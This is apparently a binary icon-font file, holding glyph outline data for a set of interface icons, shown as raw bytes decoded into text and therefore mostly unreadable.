	*33*	��@� .?M_p����!"3!2674&'.#!"&'!%2654&#"#023>'.!2654&#"3:12676&'&267>'&"&32676&#";2654&!2654&#!"!32654&+"�`�`����{w{��				�	 
	 	�				�	 	
 	���
0��
�� �		�		�y		�		�g�		�		�	#$���L	 		��	
 	
��	 		��	 
	��

`
��|��
`
��				 								����?ES&"3!2654&'>7>323267%&"32676&'%!62%!2654&#!"�(��Z��'�q���
*����q'3���a 		��		�

����^;�����i
	��9�
�L�Hc�				����
3BYe4&#"32654&#"3263!26=4&#!"01!"&/7>3.#!"3!26?>54&'%!2#!5�				��rp
�

�E
��Eqr��
�E

�
r���qr�D00	��		�"		"		6ZX	�	�WZ�Q	�	ZHWZ���_�38FPb��.'&"3:?3:373:7%>764''7%'81'81'7%'041/%.3263>'#"326?3326=33267>/54&##546;2o����0������$�.�:�L�Xa��5����`%��I		I��% �`v�yosVC����WioQ;�o�?(3��vB� �j%*�
��		��
�(&` ��@��2>J����?>03261>?>?6326?>/.?>?>70654&1././&6?6&/././.'0&#"1&/&01'46146?>?6&/&4?>?>?>30632126?601#"&#'.#0#"&1"&/./.#"&/.?>/./.50&52654&#"2#"&546+"012?201:326?46?2?>/46?>3267067>16&/"&/46?>/."&/.754&'0&'.1*#""&/.7>/<1732637>?>30301?:121001#"1/.#"##10&'.#0&156&/.#"*3'0617>/4&/.5067>506132672654&#"72#"&546v
-	&
I
	


	I	&	-
S

S
-	&
I
	

	I
&	-
S

SVT-%	I	I	$-
TT-%I	I	$-
T�IggIIggI<TT<<TT<

4*
:

	
) 	<

4*
:

	
) 	
*	
		9*
	4<

*	
	9*
	4<
�(88((88(&&&&		I
&	-
S

S
-&I
	


	
I
&	-
S

S
-	&I
	

WI	$-
TT-%	I
I	$-
TT-%	I
�gIIggIIg@T<<TT<<T&

	)
 	;
	4*
9

	)
 	;
	4*9
8*	4<

*	
	

8*	4<

*	
	
�8((88((8�&&&&���Ew��267'32>54&'7>=3023>75323:7>5<=4&+".#"3267>;2#"#"#".54>2654&#"72#"&546�k���JtQ+�``
|	�Z*CwY33YwC'�|	p	p	�&IiB=kP..Pk.BB..BB.!//!!//�=��
��5Vm8 BI�
����3YwCCwY3lw	�	�	�LB&2bM/.Pk==kP.�4B..BB..B�/!!//!!/-��>�X267>54&'&67>'.7>7>3201227>54&'.#0"1"3�0b$*z+�b�!\!��+�5jJ**I�#� U11V��!!8<-%%55*+�O�! ))��+05<! ?sI+*J��V11V !�� LMI������:r�2326?>54&'.#"01"7>'&6?>32'&>'.#"&'.546?>656&'&302126?&"326764`6�45��)(�0	|	�)(�0	!@�56���P���65�F$6�()�	�I&8�()�	�65���P�
��@�1=Iav��!"2?>3!2"/&"3267>54&#4&#"326'4632#"&%"3267>54&#!"'&47>3!2"32654&"&54632��%*
*
@	�=U
U	
�/%&&%`



��%�@
N

���Q�>���
@�&&&&


�++	��	�AU
U�&B�&&&&


-�<(���&B0��	�AM�	0&&&&`



����q��"0232676&'%.75045.'.'.54>32"&"1'&27>75<54015467241>54.#2676&'%&:&:32676&/`?~e>?>-��0999[r:;sZ8J'1��
	-@?=d~A�	���	��1[�RP�31%	98
/40zHJwS,,RwK_r!5/ 
%15�RS�[0�P::/.���2d�%&"3267%>54&"'%.5467%>32&"'%.5467>'.3267%>54&'&"'%.5467>'.3267%>54&'��&o&��q00q&��^��r((r
��[��
q00q
��[��
q00q���! �

� !T��	�				�	{
		��		
! �� !�	��	 !��! ���?DINWe3!:7>781401>7<14654&5405.'0&#'&"3!"7	777326=7%46?>'.5	�e��w)�u#��	����%�N��!7XT
@W��U�l�l/	6$x�

u��@
��@$�%�N�Kd�!��
�	V��Q��l�l����E�������0326764'.'764'&".'764'&".#.?>02764'.#&&".'&"33126?>/&"#81"&'0&'764'&".'764'3:3%267>57>54&/&"01'#5	';62'7 7M-23%st�
5L.
.K61��3

-J5
����tt%3�J@#u�*x��e�!�7K�M�	J|����H@	T��W��k�l26K.

33%tt�
!:N/
.N:!���3

,L8 		�,���ut%3�`&u

�x����R!�
&�N�Kl��@�zV	FQ��l�l����M����>5.'&.#"26?>3267>'3267>'.'""/&4?2?#"&'&'764/&&67>3267>'&67>"'&"38126?64'&"'&"326?326764/764''7�7x+(�� )L*p1o*&E(q )L*p0p�0*]@#
��$ V)^1*]@#
�# V)^���A
-��@-�`@`��KI)I�+)u6��+v7p2p
	)u6q,u7p0p�0_*T ��
.j$ 
_)3_*T �
.j$ 
_(��@��0(@��0p`@`��4I)I	���=Vbn���%2654&#"72#"&54632>54.#"&'4&'.	32#"&'.54&'.'32654&#"#"&546323267>54&'&67>'.#"3267>5467>764'&"#"&5463267>7732654&#"0.BB..BB.!//!!//�\D,N:" 9O.jR�
Ej}9<S�.�aqOgkK:L	ZB3tcF%B..BB..B�/!!//!!/t*WF,	��
@-AN��2.O9 ":N,D\

	 L:KkgO$:
� B..BB..B�/!!//!!/#N<<":N,,H5Lt��m,0M$�
S^IKk23G$/X3)b~�d�
.BB..BB.!//!!// 
'az�^��
VO�kU�	5H,,N:"<;_ 2J31kKI^
>

����6;E|3267.#!";21'"32654&'4&'.'.5463!!5!2!>830#"&54674016417>54&#81#"&'5!+"�$$��$$�	:
6,,7#*�3���!>��d%%G���<1 $&$$��$#?@

4??4		
6G"~~b��%��55GD0!CC9M=���3J^r�"326733267>54&'.'4&'>54.	"'.5467>32%".54>32"32>54.".54>32PE{[55[{EAt-E			

		

	��,E)/5[{2		����?oR00Ro??oR00Ro?2WA&&AW22WA&&AW2+L8!!8L++L8!!8L�5[{EE{[5/)E		��	

		

	E-tAE{[5�f��		0Ro??oR00Ro??oR0 &AW22WA&&AW22WA&�@!8L++L8!!8L++L8!����_��26=326=4&+";'3#326732673267>'>764'&"'>54&#".'&"2326762#".'&47>374632#"&53267#"&'p			@		

  ���/e56e.��,D
LK54KL
D,�c
-u@At.
)DKP*)QJD	�8'(88('8,
K@"!@	0	`		`	0	�@�f��
!B	�35JJ53�	B!��
�-11-(..(�(77('88't���@�HT`lx".#"%>54&#".#"32654&'326732654&'32654&##"&54632"&54632"&54632"&54632�(8��	
$
��8((8�	
(88((8�	$
"8((8	
(88(��&&&&&&&&�&&&&f&&&&�8(%
�?�	
(88(%
��8((88(%
`�
(88($
�8((8�`&&&&�&&&&��&&&&`&&&&����7AO]7#"3!26=4&+5>=4&#"#".=4&#"!546;2"326'6&#"&54632�_%	@	%a0R=#

!8K++K8!

#<R/�����<UU<<UU3A..CC..A��%0		.&�)AU0<

<+L9!!9L+<

<0UA)� �V=��=VV=|=V��/BB/|/BB/����
��4&#!"3!2667>772013!2654&#!.5467>54&5>7>'.&'&""'.'&67>764'4&'3223267>54.#"&5.%.#"32:3267>54.�	��		@	�i
.7
))A;A�		�F=5F/



	!
C!
$
	SSQ-_X?Lgg<e	
OC'[>		9R#:/	!3>0				�'1%	(B=6�A+H		:"9|1AQ6@ 
*
/(H{)!Al7[wABz]:z�G=?l:�		9RoG#k^bn$MvY>
��V�
1Ng2654&#!"33!2676&''.=4&+"##!"&'&6713267>3253.#"#"&'#74>0		��		�,2�2,�	�	�&��&
�4--4-&�
��8-4-&', �				��%0

0$>3FS'�		�*ZK1��T

"

��"���D�%3O`��M�.<HT.#"3!832676&'#!"&'&67>322654&#""32654&"&54632�F''F�xN3
2N�xw@*��*@�88��				&&&&


a.11.�\/\&$(($%].���L'�&))&�['K$	@		��	P&&&&`



����A��6?>32'&:3267021061263461647<124176&'&.#"4&+"&'&673263>/4&1&4#.#"4181.#0"1*#?;265%6&/.#764'&"01326764/%267�b
c11�~� �@$$@E	�%9�4@�~�G.�	�@B9%��E`_DI.Hk�
�"$$"�� �v-)-,)��	D#4�� ��+U"!%
6"T)��#CF`^D$!��]�my732>=326764/.#"#"2?!2654&#!5>54&#"!"3!.=326764/.#"272#"&546FM��[[��MG`aGDs�R		��)7B..B7)��		R�sDGcb
!//!!//cF[��MM��[G
`a
GS�vJ_		�>*.BB.*>�		��Jv�SG
ba
=/!!//!!/��{��67>7>7>74&'.'4&'.5467>5>30213:7>'.'.'.'>7>54&'.'#":GLD7#;
,G^66^G*B)7DJG9	ANQ-6
)C

0Oi<:hO2:$	7-ROA?.=&V#Z57
=jO./Pm>.=g!	#U%;-5D);'#j>7
CuW31UsBA5[!';,E5��{��"3:7>'.'.'.'67>5.'.54.'0"#81"767>7>7>74&'.&'>54>3021'�7DJG9	ANQ)5sk!$+Lg;<iO.$!�Z4(
ROA:GLD7An ")F_65[C&" dS)#U%;-5D)5#	;MWRDxY44XuCRWMF!2,E5.=&U#$QWR<jO/.Pl?RWQ

���vy����"!#"3267>5.#!"!'32654&#!";1.#"32>7!#"3267>5.+32>54.%#.'!7".54>327!#!".54673267>'>32#�.V%�3-		&:	��Z�c�		��		Jmb"K)E{[55[{ECwZ6c.		':	~�w4%5[{EE{[55[{�^���)9"}��>L��?oR00Ro?$D�22Rk<`?oR0E9��!M)?oR00Ro?`N$		 E	��				��5[{EE{[52VuC#		 B��<EO*E{[55[{EE{[5��N��T+OF:���'��v0Ro??oR0��=iN,0Ro?L�*��
0Ro??oR0����*3Kb4&'.#!"#&3!26=4&#>5!5463!2!.#"#"&/.54673267>32#".'�!��  6^�K�$	�
%}K\4��� �9.,LY%$PFEP$,!R@LY%$PF,7XuC<jT<
�6�..�6G�uL��$		&Lu�G��)v/$!!

/|*��$!@f?3Tl9����&7GWhx��4.#"02183326720183>5!.54632!.54674&'>%467.5>54&'";26=4&#+"&=3�7p�qq�p7��������),

,)W))W�� %!RG1^a @ a^1GR!% ��ad32"6B!.dS6%!B6"23da6Sd��	`		`	��LqK%%KqLW��``��WC�~ff~�C�XX�9wpb%"bqy9q�"�``�"�q9yqb"%bpw9_z$zV2hc\&%[eh2��&\ch2Vz$z_2he[�	``	p		P���'7A�2>54.#"2#".54>"3!26=4&#!5463!2'01326=041>72764/&"#"&'.546764/&"�E{[55[{EFz[55[zF?nS00Sn??oR00RoQ$	�
% �� 
�	
M�9&0
9�PP�99<<91%+ /CJP)5[{EE{[55[{EE{[5�0Ro??oR00Ro??oR0��%0		.&B �3		3;4%19<<99�PP�9
1&EJP)+TMG- ����6Bfr~���������	738126732673812676&'>'.#".#".#""&'>7467>7>7.'.'..'>77>77>7.'.>54&'.'>7>7.'#"&'>7>72.'.'>%2.'>>32.7#81"&'&672654&#"72#"&546S=<]88]<=S-JJ-S=<]88]<=S-JJ-�,M$K%%K$M�-00--00-22(<$"�<"$�22'<$"��$<"5F37	%?=3�3F3=?%	7��,M$K%%K$M�zF37	%?=3[?%	73F3=W!//!!//!�!"]nn]"!*�OO�*!"]nn]"!*�OO�*�aR		Ra�66668**))� <	
F< 
�**))� <	
+
	< 9"L)4@s�%s@4)L"�aR		Ra�"L)4@s%��4)L"%s@8/!!//!!/����.:F"3267>54.#.54>32"32654&"&54632�O�i<p�vv�q<i�Oty]7`�II�`7]ytOqqOOqqOB^^BB^^�=h�Pw�nm��yP�h=�%t��fI�_88_�IhȤrqOOqqOOq��^BB^^BB^���*6BNZfr~��"0212676&''.7>3#%32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"54&+"021812>'"&'.54>313B]]BB]^C5KK55KK4�



�



� 







��



�







�@



�	�4]F(&$$]34]F(�-R!$>R.�$=Q`]AC^]AC^��K55JK55J�






�


�3


3


�3


�


�3


Q�	(E\44^$%'(E\�#  R-.Q<#�.Q<#	��@�@d�������&.'.##"&'&3267>7:3267>=>54&'4.#"3267>732>"&'"54&'.54>32#"32654&"&546327"32654&"&54632%"32654&"&54632u^WW"7>\-
1fC
-T>Bc�O��oqS#7E!�FCq��I� D1g A6"N��jh��KD}�j&&&&


�&&&&


�3&&&&


�]F>]z !
$/�,g5Qm2\�tBCt�[7]N?�LM	:i���
8F�:IW3T�l>=k�VS�a5�&&&&`



`&&&&`



]&%%&`



����0Z".'.#"3267>7>54.#.'.54>3227>7>32`;o--o;BuW2/!/��mm��/!/2WuB�*��qq��*=7-Oh<5d(!!(d5<hO-7=�+(##(+2WuB-QLJ&8�rNNr�8&JLQ-BuW2��1tkSSkt1H�S<hO-'$++$'-Oh<S�H��@�S.#"3!2>54.!".54>;2654&+">32326=81?<m�e]�wG3N5/Oh::iO..J\L�3]F* @`@0		0;i�`g�b0		$OB+)F] P�uFAs�\BQZ'=nT19Xl3>lQ2��,Kc6%^S:		G�nCJv�K0		0)Ga;.`O3��@�y.#";2654&+".54>;2654&+">32326=81+"&5326764/&"2?;2>54.?<m�e]�wG3N5/Oh:�		�3]F* @`@0		0;i�`g�b0		$OB+)F]4�NB���
�U[�:iO..J\ P�uFAs�\BQZ'=nT1		,Kc6%^S:		G�nCJv�K0		0)Ga;.`O3BN������I[U9Xl3>lQ2��@�}.#"7>32326=85#!".54>;2654&+54632'&"326?64'&"4.#"3!2>54.'?;m�e0-g�b0		%OB*(E]6�0\H,?`B0		0gYQo�
�

�
�#<R/3S: ?`@!%IlF=iM-1L[)!O�tFJv�K0		0#CdC9dI*#DfC1aN0		@YhpQ�`|
��
|�/S<# :T3B8Sh57mV6/Ro@LpK'��;�Y����&"&#76&'&#76&'&#4.#"32>733267>/33267>/3633267>/76&'".54>32#4.#"32>734.#"32>73#".54>32##.#"32673#".54>32#3#"&54632#&9L-9K39KQ��jj��QQ��jf��UK93K9-LGG��c��LL��cc��L`=h�OO�i<<i�OK�fA`P���)E]55]F((F]51WC,`<]zEI�`77`�II�_8`�J55KK5,Db';K*.R=##=R..R<$`pJ
1(88('8P

[E[E[j��PQ��jj��QK��d[E[E[UU��L��cc��LK��cP�h<<i�OO�i<6_�J^�yF�5]F((F]55]F("=R/CuW17`�II�`77`�I5KK55K6*)F4#=R..R=##=Q/ $8((88(

�����'U[ch2>54.#"2#".54>32673267>54&!6&'."!&!>2.'j��QQ��jj��QQ��jc��KK��cc��KK��]��/H1
���,bdb,���
1H/RJ�@���&QTQ&��JRAQ��jj��QQ��jj��Q�K��cc��KK��cc��K����DQ[2
6��
2[QD-Q�/X��%����/�Q���+;B4&#!4&#"32>%4>73!#".5%!2654.#"!�	�P	`�~IG|�d\��K��Aq�W	�Hv�T]�tB�	I~�`		U�pC�`�	�	I~�_d�|GK��^W�tG�O	T�rCBt�]O	`�~I	�?	�Dp�U
�����(6DRcu������"32>54.#".54>3226=4&#"#";2654&;2654&+"%26764/&"&"326764/64'&"326?326?64'&"#&736=4&#.54673'267>'764'&"&3'>32"'&47j��QQ��jj��QQ��jc��LL��cc��LL��S��@@�@@��22�00 33��00W����UU=		

$

�Q��jj��QQ��jj��Q� K��cc��KK��cc��K@@���33��00�22�J00RP�
<UUF
s$$���%/:JTboy�������������32>7465<'4654.#".'>7373.'>7>32#"..'>73267!467.#".'>774&'>7'.'#"&'>32.'>7#467.'.'3>7.'>74&'>7.'%.'>#46T��gg��TQ��jj��QD#�3,%'�-::	""(Bl!@!(4<<��<<!@!lB(
#D�(Bl!@@::	""�!@!lB(�D#D'%,,$D*=h(*D$(h=�').j$D*=h�	*D$(h�'�.�g��MM��gj��QQ��j�#H$1]�C{5
,c5�@gI''Ig�vT
T�(~'T..T'�%D 'D�
Tv(�T�,X+1m:�T�(vT

@gI''Ig:
Tv(�t+X,:m1�$H#
*]1�
5{C5ct
<a"L2�"a<
2L�>s3
;�M,
<a"Lc"a<
2L�
3s>M����';p����32>54.#"2#".54>2>54.#"326=2#";#54&#".532654&+>726?32654&'76&'..#"374632#"&7.'7Q��jj��QQ��jj��Qc��LL��cc��LL��cV�qAAq�VV�qAAq�6		K�g@0		2<i�O		J�_72		0;^zF��(8��	(8��&&&&�@
Y�V�j��QQ��jj��QQ��vL��cc��LL��cc��L��Aq�VV�qAAq�VV�qA0		27_�J		O�i<2		0@g�K		Fz^;���8(��8(	��&&%%�Y@�
=C���}!3D���+@Tbv����326?64'&"326?64'&"&"326764/326764/&"326781>7>7>7>781>4&'.'.'.'.'."8181>762818181818181"'"&'.'.'.'&47>78181>7>7'>7645.'&47.'.'7.'.'7:7>7"%'>7>7.'.'7'.'&"'62>7'>7>7>"&'&3267>'.3267>'.4676&'&>4&'.3267>232676&'."7�_^�^_
@
XX�XX-"5&P))P&
	2%	'.
&PRP&

2%2	
������T 
�

J0�J		J?�U.	J


�!$
�

J
*yJ
		J?��	J

�!.�7x|x7
:�BB�:
�P!""!  
z!""!
  �V7x|x7:���:
g_^
�#^
^�XX�"
X
X�	
&PRP&
.'%2	
&PRP&5"%11
		


?�@J		ZJ?�@J		
�*
J

�#Y��p!�

J	. 0J

�
 G��-�

J	.!�  
"!!"
�:���:
7x|x7
�:���:
7x|x7
�  
"!!"
���'=IUamy���2>54.#"2#".54>326764/54&#"%32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"j��QQ��jj��QQ��jc��LL��cc��LL����		�{







��







�







 



��



@Q��jj��QQ��jj��Q�L��cc��LL��cc��L�g
��

�






s


��


s


��


�


��


����2>54.#"3267>'.'.'.'&67>7>323267>7>7>7>7263.'.'.30216>'.'.'.'.#"&'>7>7>7>76&'&"#.'3:3>5.&'.'.'.'>7j��QQ��jj��QQ���


2o<9l0;p2%C(&@"6v@/N9#&[4&R+'N&		$J%)N$7_( 8L/



2o<9l0;p2%C(
&@"6v@/N9#&[4&R+"C!	$J%)N$7_( 8L/@Q��jj��QQ��jj��Q�9u<+V*!=	
	;(Q)?{=( 8!6	
	45!)	P`m;/L					R5;naR9u<+V*!=	
	;(Q)?{=( 8!6	
	45!)	P`m;/L				R5;naR���'c�2>54.#"2#".54>67>'.'.'.7>763267>54&'.!67>'.'.'.7>763267>54&'.j��QQ��jj��QQ��jc��LL��cc��LL��F


	#=:#4"7



	#=:#4"7
@Q��jj��QQ��jj��Q�L��cc��LL��cc��L�k
			9.D�=KP$5G


			9.D�=KP$5G

���Th4&#"!"3!3265!2654&#!!#.'54&#""#";3326=>532654&#".54>32 		��		0		/		���T@f�L		R�pEP		NAq�V		P�g<R		�O�i<<i�OO�i<<i��		��		��		/		L�f@R		P<g�P		V�qAP		REp�R		�`<i�OO�i<<i�OO�i<����'A[q��"32>54.".54>32"326=4>;2654&#!#";2326=4.54&#"326764'76&'&3267%.3267>'�]�yGGy�]]�yGGy�]V�qAAq�VV�qAAq���2WA&		!8L+		�		+L8!		&AW��		���`
`
`�Gy�]]�yGGy�]]�yG��Aq�VV�qAAq�VV�qA�&AW2"		"+L8!				!8L+"		"2WA&���

��
���
�
�
�
�����;{32654&+"326=&'&32>7>54.'"'.54>7>676&'.#";26781>=4&#T�		�			"4$$4"3{��B.]/2b]T%$8&&8$�f	"4$$4"2y��BF���4%8&&8%�		�	@			�		�"NV]00]VN"3B&8%$T\c33c\T$��	�"NW\00]VO"1B	
F5$T\b43c\S%		�	�����(4@LXq"32>54.#".54>322654&#"72#"&5462654&#"72#"&546#"&'.326764'&"j��QQ��jj��QQ��jc��LL��cc��LL����&&&&


m&&&&


7(o;=p(.}DB|-�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�&&&&`



`&&&&`



��,12-3761�����(DP\ht"32>54.#".54>32"67>32326764'.#'2654&#"72#"&5462654&#"72#"&546j��QQ��jj��QQ��jc��LL��cc��LL��^C{.)n<=o).}D�&&&&


m&&&&


�Q��jj��QQ��jj��Q� K��cc��KK��cc��Ke71,01-38j&&&&`



`&&&&`



�����(X"32>54.#".54>32#&#&73736'536'56&#5>3627>'56&'";#"#54&+53267>=46;j��QQ��jj��QQ��jc��LL��cc��LL��
UR)0

0
b	P

P9
(&NN
A	00!:D�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�U75
`
�

�
`
0`
^"=>
��
>E64=�����(|�"32>54.#".54>32>76&'..#".'.#"""1'&32>5<5>764'.#"&'>7>'.#"&'267>54&'.'>76&'.5467267>'.546327>77263j��QQ��jj��QQ��jc��LL��cc��LL���
+2H5`"		%8
&W-JuR+

7'HiB.1	$#

*m;4$!
�Q��jj��QQ��jj��Q� K��cc��KK��cc��K~
H24+
	0	'

	7Yr:94eP1

	!'+1
$4
�����'fs�"32>54.".54>324&+*#*#"3267.#"32654&'.'.'&65>5>54&'3265"&54632#"&54632%#54&#"#&73326=3654&j��QQ��jj��QQ��jc��KK��cc��KK��"
�5LL5	
B]]BB^
3
�4II44JJ4'88''88cK
	N

N
K

�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�
@..@	E11EE1,/'
�11##11##1&----[L
	P

L

L

�����'@Wdp"32>54.".54>32"3232654&'.#5"3232654.#"32654&#"&54632j��QQ��jj��QQ��jc��KK��cc��KK����

6Y !

&$%e=

V�l=

Bu�]0&&&&


�Q��jj��QQ��jj��Q� K��cc��KK��cc��K!

   Y6

=e%%&�

<k�U

\�tA��&&&&`

�����'w�"32>54.".54>32#56&+"7&3267>7>'56&'&"#"&'.'.5&4=36'56&#&3267#"&'.'./.'56&+5>7>7>7373j��QQ��jj��QQ��jc��KK��cc��KK��-p
S
	
0
o

o




/	3
o�Q��jj��QQ��jj��Q� K��cc��KK��cc��K_p
	W
 �,
		MN
`
a
^%

�
:

o
@�����(GS_os��".#&;26=067>32;26'56&##54&#"#36?>32"32654&"&54632#";2654&#3"32>54.".54>32p
	`		`

	
d
`3qB"	
A>		]�&&&&


!_

_

@@�j��QQ��jj��QQ��jc��KK��cc��KK��B
��		�
�		�SD���!
	�?
	
#Q�&&&&`



?��		`
��?�Q��jj��QQ��jj��Q� K��cc��KK��cc��K	�����'I��q��"32>54.".54>32.#"3267>781>54&'.'.'"&'"&#*#*"#".'.'.'>7>7>7>7>7>7>7>7>7>7>7263>7'2""#4&5.'"4'.'.'.'.'.'"4#>010"#'"&#"&'>7<5233232381263263>7>3>7>3.5461>7>7>7>7>7>7>7>7467>7>7>7>7>3&7.'<#.'267263623:3223j��QQ��jj��QQ��jc��KK��cc��KK��X%`61BU2-"T,64J$" 	
		
	
�+O	


	 P		
8	@1~
	

			

"$a



	4n�	
		



2"�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�'*
	rG:i%W7"1[$�F%
�

		
		5U�
	 T.�!%=k=�c`�"32654&"&54632%'764/&"'.+"'&"2?;26?2?64/7>=4&''.#'4&'&'7>'./572676&/77>5736?3�B^^BB^^B6MM66MMP]:�J�J�9\\9�J�J�:]jBwT
�
TwAiiAwT�
TwAjp^BB^^BB^��M66MM66M�J�9\\9�J�J�:]]:�J��
TwAiiAwT
�TwAiiAwT�	�Im!^n�������64'&.#"6&'&"32673267>'32673267>76&'.'>54&'3267%624&'&47'.'&67>32%&'&67>32#".54>32'.'>762%"32>54.#".54>32'54&#"326764/`(()s) D%$E(t())
$3

D#$C	 2$�v!\!5S!!�

x


l3WtCBuW22WuBCtW3S5!]!  ��6_G**G_66`G))G`60V@%%@V01U@%%@U#NJP(s))((()s( D$+OG<	





	<GO+$E�!!T5 ]!�q
	
	

8CuW22WuCBuW22Wu[5T!!!] f)G`66_G**G_66`G)�%@V01U@%%@U10V@%��OJ�8o|���.#!'.'.'./.'#.'#"&+";1!'>?>'##81'!"&/#'0&/#"&546;2322!21"32654&#"&54632%"32654&"&54632��t�$%X$X�j5e
�{
f
.o�*�
�#$33$$33$!!  $33$$33$  !!�
E%%M�#�Sj�		�dZ
5��3$$33$$3�!!!!�3$$33$$3�!!!!��42'+0=FZht}2654&#"352"5463%!"3!2654&#!5!!2654&#"352"546&"326?'#";2654&2654&#"72"546�


4����i��3

�
JGX[�PP/



�

%U��������8


'�
HG
XY�


'lA��,CGKVafj|���%!"&5463!2#!"3!2654&#"&54632#5!32+!#"&546;%#33#7627764'&"3#53#"&/&4762#"&/&4762#"&/&4762#"&'&4?62#��3**f

���

**���

�$

G�{��kHH/B<���NJ<

���llll�LLfLL�LL�$$A**

��

*��*H
�.�
��$�R���C;��/�J<


��A$$�$�LLeLL�LMG$$��{16;@��������"0010;26?0&5061463>7>54.##'37#'37#'37#54632654&#""&#.#81"381812#.'.'.54>3226=4&#"3326764/&"4&+";26326?64'&"&"326764/7#";2654&#'26?64'&"3/1U@%/+'q'+0%@V0-Z`	ms
�
�
;C				
C'+ 8K+*K8 +'v				�FF>	c		c	>GF�FF�c		c		�FG�%@V07`"��"`70V@%�{,,;;�"�							
�"U1*K8  8K*1U�	c		c	SFF�				�FFFG�				�FF	U,��'+0<FR\2654&#"352"5463%!"3!2654&#!5!!2654&#"72"54632654&#"72"5463���		>		�������1n	��		>	����O���333 } ;t��"32654&'>54.#2.'.54>3#"&54670317067467>7>7>7>7>74&#"3265!4632#"&53ZC'1<DR�ba�RD<1&CZ3,N;"%6==6%";N-�nVWnH@
@H*[?@[[@?[��H32II23H}'CZ3$bmr46"-==-#54rna$3ZC' ":N-%jtp+!!+ptj%-N:"�-00)		
		)�@ZZ@@ZZ@3HH33HH3 E�&
)Zf��%26=4&#"#26=4&#"#26=4&#"#'.#"#76&'.#"#"3!267>=4&##!"&5!#!"&=46;7>!'&6763226=4&#"�qpʙN,�-O�+#7++7&,Q��6�6w���YPfOY�����������~
,FG,+*/��*+</*+�:���*�||�*�����k|�%Khv����!546;267>'.=4632;2%!54&+"&'.7>=4&#"+"!"&'.=+"&5463!2#%!5!37>"&=4632#"&=4632#"&=4632#"&54632|�`'�;)*;�'��]�
((�L�\#T

;

�m���9>
P



J



J

	
9x�(	+*;;*+(�"d
%''$
d��?G

		��
"��}
u"
�

�

�

�

T

T
���wUjt~26?>54&/.+54&#"#";#";32654&'532676&/7>'.+53#"&5467326=!'7!%764/!!�__�		�TT�__�@XaFGaX@�TT�L=<MD6	7COEE��PPo�QDDoOO��|_^			TT	 _
_�3$'55'$3�	TT	 ��''%<<%E
EPO\EDOP:Y\�)BO.'>54&'.#"3267326764/'#"&'.5467>32%34>35"_(,/,-r?>r-,//,-r><m,��$(h98h((++((h89h((++(�K!8L*0VA%o+m<?r,-//-,r??r,,0,)��)++)(g99h((++((h99g(�+K9 %@V1
��#�&7;JZjv�%"32654&"&5463232654&+"3!"3!2654&#!!'32654&+"3%!"3!2654&#!"&5463!22654&#"72#"&546

1//�e

���w�~~	"�:%%�&&�:��}uN



&P
��

Q
��-G		�%��&&R%�nRX&P�_
)Ll!"3!2654&'!"3!2654&'!"3!2654&7!":1!3:7>=3021>54&##*1#"'.#!0"#"&5463!2�b		�		�b		�		�b		�		��*'&��X&'$f	��c��				h				g	

	�(��'��'(��	����S���@DQim4&'<'4"1.'"&#0"1!"01"#8813!267201647465
0"1/0"1%!22320120126162?!%7%%���=��&���GC���֘GG!�!�&����� ����75�� 77���9�&h�E
!HSXj!"3!2654&!"3!2654&!!#4&#!"#"833!26?>7>54&#463!2!!'!7!"&'.5463!2#���Rt��

;

���6�Q:CI
����:�!F(D��xH�	��

h	��H�K��
SI
�

���v((IZ�! ;S..1270>7>4&"'.467>7>2#1"1#"&514638�+mro--orm+----
qePm�o---Z��

��$##$"UZX$++$XZU####��		+=		P8+,((((,+-ptp-q}dl�n-ptp����		^#Y\X#"#!''!#"#X\Y		=+		8P@ &O.#".#"31!2>54.1!"&5467>'.5463067>32#=0Mc8+PC6
<T.:!8L+@2WA&4GW��<T&"!	
/!
nA+M<%$>QgI7_G(,=%T<^:+L8!&AW2,N?*�mT<&B"!/;G6J,"b?Ig����.K.'%'.#"326?3267>'7>''.#"6&/%>?� ��t	$$	t�� 
�-
		��		
-�
��-�				�-�
tt
�.'��''��&}}&�'�!��}}!�(��(�
% �@"6i}������.#"3267>7>4&'.'"&'.467>2.'.#"32654&'>7>7>4&'"&'.467>22654&#"72#"&5462+"&546372+"&546372+"&5463%6#"&57>?�A�AA�A		A�AA�A	

	@�@@�@5iii54iji42e3�]]�3e3>g���hh���g_		

&		`

�		`

`		`

��		x
	
��

5jji5

5jij5�N



2eed3



3ded�		M���M	

	M���M��

J���J

J���]@				��				`				`				�		
=		Y
���=T_s�4.#1"&5463021281#"&51.#"326?!2676&'#"&/.546?4210#7">5!%+5467>32"&5463021281#"&514.#1`-Oi;		BtW2		��#		 d�$$d�1�@�c

�d
.�����

�*	���

\�zF

=h�O;iO-		3VuB		�1�HdP�d 9���d�
c����W	�

�@	�

Gy�]

O�h=` !19#"54&#!"3!26=;2654&"&5463!2#%#'5'573�
	W8(��(88(`(8W	
&&��

`

 � � 
V((88(�(88('U	
&%��


�
� ��
@����%/9DTYin~�.+54&#!"#"#313!26526=#%463!2!#!"&5!7!5463!232654&+"3#32654&+"3#32654&+"3#�7&`8(��(8`&7&K55K&��
@
��&�&�@�
�
��@

@

@@�@

@

@@�@

@

@@�%5 (88( 4&F%��5KK5 %Fz

 �%% ` @

�`
�

�`
��`��@
�

�`
��`��@
�

�`
��`�����-FY%.'>7>.'.#"3!2676&'%"/.7>32>?3267�,NkA0=
	*$*tEEt*$*	
=0AkN,"�"��9�9
"1	$>X::X>$	1��(Hd=O..O<dG*5$(<�6&isr.6785.rsi&6�<($((�
BB
+ahl53eO11Oe35mga�!%

$"���-Zx�";26?326=326=732>54.#"&'#"#"#5817.54>32#.'.7>7>54&.'>7�BuW2�{
&`
.K%@%L:BuW22WuB#Ba	
@&K
	-[u/(F]55]F((F]5�A&!.A&!.c#>	##>	#�2WuB:�{
`&
.&@&KL2WuBBuW2��a	
K%@
	-[u/B#5]F((F]55]F(8&A-!
%A.!	T=##	>##	���!1EY"13267132>54.#"&54675%".54>322#"#"&54>�P�i<��B/)([1P�i<<i���"
(���BuW22WuBBuW22WuB		Pp		#=R�=h�O1Z)��*/B<h�PO�h=�J
!(���2WuBBuW22WuBBuW2 
	qO		.R=#���l��
'.'76&/.#"./.+"'.#"326?;26?>7326?>/>?>=4&''.#"#'.'.'.#"'7>'.'./57>7>76&/73267>7>?3326?"32>54.".54>32"32654&"&54632�c	8
>		T
$W$
S			>8	cc	8>			S
$X$
T		>
8	co	8>S
	X	
